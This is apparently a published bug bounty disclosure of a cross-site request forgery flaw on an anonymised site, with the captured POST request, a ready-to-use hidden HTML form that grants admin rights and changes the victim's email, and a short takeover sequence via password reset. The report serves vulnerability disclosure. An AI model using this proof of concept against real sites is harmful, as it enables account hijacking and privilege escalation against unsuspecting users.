Takeover Victims Account Via CSRF

  • Reported to Private
  • Reported by Haqtify
  • High (8.7)
  • $600
  • Published 1 month ago
  • No Likes

URL:

https://private.com

Description:

I just found out that we can take over any accounts by just letting our target user visit a link. Yes, just a link. We can change any info , even password via CSRF Attack. There is no authentication token passed which restricts CSRF for execution.

Request:

POST /user/save?context=1 HTTP/1.1
Host: abc.private.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 612
Connection: close
Cookie: [cookie]

safestrings=true&name=admin&email=email%40gmail.com&admin=true&admin_u=true&limited_access=false&job=&full_name=a

CSRF POC:

<html>
<body>
<script>history.pushState(”, ”, ‘/’)</script>
<form action=”https://private.com/user/save?context=1″ method=”POST”>
<input type=”hidden” name=”safestrings” value=”true” />
<input type=”hidden” name=”name” value=”admin” />
<input type=”hidden” name=”email” value=”email&#64;gmail&#46;com” />
<input type=”hidden” name=”admin” value=”true” />
<input type=”hidden” name=”admin&#95;u” value=”true” />
<input type=”hidden” name=”limited&#95;access” value=”false” />
<input type=”hidden” name=”job” value=”” />
<input type=”hidden” name=”full&#95;name” value=”a” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

Account Takeover Scenario:

  • We send CSRF to users and update info and change email addresses.
  • After executing the victim email changed .
  • Lastly we reset the password to my own email address which i update on victim as CSRF.
  • Account compromised.